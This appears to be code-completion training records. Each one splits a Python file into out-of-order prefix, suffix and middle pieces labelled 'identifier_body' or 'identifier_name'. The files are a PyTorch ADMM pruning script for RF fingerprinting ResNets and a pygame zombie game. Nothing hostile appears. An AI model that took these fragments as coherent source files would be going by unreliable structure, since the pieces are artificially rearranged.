help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
|
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs))
| batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict | identifier_body |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def | (self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main()
| decrease_graphX | identifier_name |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
